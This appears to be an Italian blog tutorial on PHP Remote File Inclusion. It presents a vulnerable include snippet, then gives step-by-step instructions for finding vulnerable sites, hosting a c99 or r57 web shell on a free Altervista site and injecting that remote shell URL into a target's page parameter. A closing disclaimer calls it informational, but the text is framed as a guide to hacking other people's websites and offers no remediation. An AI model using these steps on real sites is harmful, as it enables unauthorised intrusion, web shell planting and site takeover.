Una particolare tecnica hacker, utilizzata per l’attacco ai siti in PHP è il “Remote File Inclusion” (RFI) che consiste appunto nell’inclusione in un sito di un file da remoto. Ciò permette all’attaccante di eseguire particolari privilegi amministrativi una volta svolte una serie di procedure; andiamole a vedere dettagliatamente una per una. Innanzitutto c’è da dire che questa falla di sicurezza è dovuta a degli errori commessi dai programmatori nel far visualizzare vari contenuti all’interno di una stessa pagina del sito; in questo ambito, l’hacker può prendere la palla in balzo e iniettare una “shell”, scritta sempre in PHP, che permetterà di acquisire vari controlli su di un sito web. Entrando più nel dettaglio, il source della RFI è il seguente:

<h3>RFI Source</h3>

<hr>

<?php

if ($_GET[‘page’]) {

include $_GET[‘page’];

} else {

include “index_inc.php”;

}

?>

Possiamo facilmente reperire siti vulnerabili a RFI osservando la struttura URI del sito; se ha caratteristiche simili alla seguente (https://www.mysite.com/rfi.php?page=index.php), allora possiamo sfruttare la falla di sicurezza.

Benissimo, abbiamo fatto strike e trovato un sito potenzialmente vulnerabile a questa strategia d’attacco; ma adesso un passaggio fondamentale è trovare una shell, che ci permetterà di portare a termine l’attacco; una shell è facilmente reperibile in rete e le più utilizzate sono sicuramente la c99 o r57. Una volta scaricata una delle due shell proposte, create un sito su altervista e uplodate tramite FTP la shell, rinominandola a vostro piacimento (es. shell.php). Siamo quasi giunti alla fine, tutto ciò che dovrete fare è ritornare sul sito vulnerabile a RFI e apportare le seguenti modifiche alla struttura URI, come da esempio

https://www.mysite.com/rfi.php?page=https://www.rfi.altervista.org/shell.php

Se tutto è stato svolto correttamente, c’è buona probabilità che il vostro hack vada a buon fine.

Ricordiamo come sempre che le informazioni riportate in questo articolo sono state descritte solamente per fini informativi e non devono intendersi come incitazione a compiere azioni illegali di pirateria informatica, severamente punibili dalla legge. Per questo, ne io, ne qualsiasi altro membro di StartAndGo, ci assumiamo la responsabilità di eventuali usi scorretti delle procedure riportate in questa pagina.